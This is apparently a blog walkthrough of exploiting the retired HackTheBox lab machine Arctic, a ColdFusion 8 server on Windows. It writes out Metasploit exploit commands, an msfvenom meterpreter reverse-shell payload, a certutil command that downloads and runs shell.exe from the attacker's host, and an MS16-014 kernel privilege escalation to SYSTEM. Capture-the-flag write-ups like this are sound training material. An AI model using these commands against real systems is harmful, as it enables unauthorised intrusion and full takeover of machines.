Arctic HackTheBox WalkThrough

This is Arctic HackTheBox machine walkthrough and is the 7th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Arctic HTB machine. Before starting let us know something about this machine. It is a Windows machine with IP address 10.10.10.11 and difficulty easy assigned by its maker.

NOTE: Although there are other methods to solve this box, but I rooted this box using metasploit. To exploit this machine with metasploit you should have patience because the FMTP server running on this box possess a long load time about 20-30 sec to respond back with the request. In addition, the connection from the server get lost after about 120 ping requests. You may lose your meterpreter session when the connection from the server get lost. Therefore, you have to be very fast and accurate to root this box before your session died.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Arctic machine by pinging the IP 10.10.10.11. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a popular port scanner] for this task and the result is below-

Scanning

$ nmap -sC -sV -oN arctic.nmap 10.10.10.11

Default port scan result in Arctic HackTheBox WalkThrough

Nmap revealed ports 135, 8500, and 49154 are open. msrpc service on port 135 & 49154 and FMTP service on port 8500 are running. Did not know anything about FMTP service. After some googling found that, it is a Flight Message Transfer Protocol and is used to exchange information between Flight Data Processing Systems and Air Traffic Control Unit (ATCU).

Since nmap could not confirm the exact version of service on port 8500 so I tried to manually banner grab the service on this port using netcat. Netcat even didn’t give any information.

Running nc command to banner grab the service on port 8500

Then tried to google for FMTP service and port associated with it. Found this article. In its, first line it is written ‘allow remote access as Web Server’, so I immediately go to the URL http://10.10.10.11:8500 and after 20-30 sec of wait it showed me a web page. This confirms that a web Server is running on port 8500. This web server has more loading time so you have to wait 20-30 sec to access its files.

Snippet showing Port 8599 services

After some enumeration found this http://10.10.10.11:8500/CFIDE/administrator/ URL. It revealed that Adobe ColdFusion 8 is using this port.

Coldfusion version 8 login page

Soon I get any service and its version I immediately search for exploit using searchsploit (an exploit-db querying tool). Searchsploit listed many numbers of potential exploits and most of them are of XSS. There are also two exploits whose metasploit module is present, so I grepped them. One is for Directory Traversal and other is for Arbitrary File Upload.

Searching for exploit

$searchsploit coldfusion 8 | grep Metasploit

Searchsploit to see available coldfusion exploit

Tried second one because it could give us the shell and I was able to get user shell easily. Let us exploit the vulnerability to get user shell.

Getting User Shell

msf5 > search coldfusion

msf5 > use exploit/windows/http/coldfusion_fckeditor

msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11

msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500

smsf5 exploit(windows/http/coldfusion_fckeditor) > set PAYLOAD java/jsp_shell_reverse_tcp

msf5 exploit(windows/http/coldfusion_fckeditor) > set LHOST 10.10.14.6

msf5 exploit(windows/http/coldfusion_fckeditor) > set HTTPCLIENTTIMEOUT 150

msf5 exploit(windows/http/coldfusion_fckeditor) > exploit

If you are getting upload error then increase HTTPCLIENTTIMEOUT to more than 150 sec. Moreover, if do not get shell in one attempt try to run it twice or thrice. In addition, you have to wait for 3 to 4 min after the shell is open because server respond very slowly. I have also used a metasploit advanced option HTTPCLIENTTIMEOUT since we know that the server respond very slowly.

Getting User Shell through Metasploit

We successfully have got user shell. Let us capture the user flag.

Capture User Flag

$type \Users\tolis\Desktop\user.txt

User flag Captured during Arctic HackTheBox WalkThrough

Privilege escalation

For privilege escalation, we have to first find a PrivEsc vector using which we can perform privilege escalation. Soon I get low privilege windows shell I run command systeminfo to get information about windows and about the hotfixes (patches) installed to this OS. If no hotfix is present then I definitely search for some kernel exploits using exploit suggester. When I ran $systeminfo command in arctic box it revealed that it has no hotfix installed into it. In addition, its OS version 6.1.7600 also appears to be vulnerable according to my knowledge.

Running Systeminfo command to check hotfixes and Windows version

Right now, we are in a shell from metasploit so CTRL+Z will background the shell and then we can use module multi/recon/local_exploit_suggester to list all the possible kernel exploits. But, when I press CTRL+Z it don’t take me to the meterpreter shell instead it completely closes msfconsole. This is because we have not used meterpreter payload while executing ColdFusion exploit. To run local_exploit_suggester we have to anyhow, upgrade the shell to meterpreter shell.

Upgrading Shell to Meterpreter Shell

To upgrade the shell to meterpreter shell I did the following things

1. First of all got a shell using the ColdFusion exploit, which we have already done.

2. Created a msfvenom payload named shell.exe using a 64-bit meterpreter payload.

3. Started python web server locally to host this payload

4. Started a listener in msfconsole

5. Changed the directory to C:\Windows\Tasks\ (which is public writeable directory in windows OS) in arctic machine

6. Downloaded the payload on arctic

7. Executed the payload shell.exe

Ran the following commands:-

On Kali Machine

In window 1:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4321 -a x64 -f exe > shell.exe

$ python3 -m http.server 80

In Window 2:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 10.10.14.6

msf5 exploit(multi/handler) > set LPORT 4321

msf5 exploit(multi/handler) > exploit

meterpreter > sysinfo # After getting shell

On Arctic Machine

$ cd \Windows\Tasks\

$ certutil.exe -urlcache -split -f "http://10.10.14.6/shell.exe" shell.exe

$ shell.exe

Upgrading Shell to meterpreter Shell during Arctic HackTheBox WalkThrough

We have got a meterpreter shell. Now we can run our post exploitation module.

Finding PrivEsc Vector

meterpreter > run multi/recon/local_exploit_suggester

Running Local Exploit Suggester to list all the available kernel exploit

local_exploit_suggester module found 5 kernel exploits that can be used to escalate privilege. I tried each of them but only windows/local/ms16_014_wmi_recv_notif module worked. So here, our PrivEsc vector is Kernel Exploit. Let us escalate privilege and get admin shell.

Getting Root Shell

meterpreter > background

msf5 exploit(multi/handler) > use windows/local/ms16_014_wmi_recv_notif

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set LHOST 10.10.14.6

msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 3

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit

meterpreter > getuid

Privilege Escalation in Arctic HackTheBox writeup

We are NT AUTHORITY\SYSTEM now which is the highest privilege in the windows OS.

Capture Root Flag

$ cat 'C:\Users\Administrator\Desktop\root.txt'

Root Flag captured during Arctic HackTheBox WalkThrough

This was how I rooted Arctic HackTheBox machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].

Next retired HackTheBox machine WalkThrough is Cronos.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/